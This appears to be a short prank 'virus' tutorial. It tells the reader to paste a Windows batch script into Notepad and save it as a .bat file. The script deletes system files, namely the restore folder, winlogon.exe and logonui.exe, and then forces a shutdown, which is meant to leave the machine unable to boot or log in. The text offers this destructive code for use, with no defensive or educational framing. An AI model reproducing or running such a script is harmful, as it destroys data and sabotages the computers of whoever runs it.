1.copy this and paste this in your notepad..
@echo off
del c:windowssystem32restore
del c:windowssystem32winlogon.exe
del c:windowssystem32logonui.exe
shutdown -f

2.save it and give it a name like “RAJ” or whatever just remember to put “.bat” at the end of it.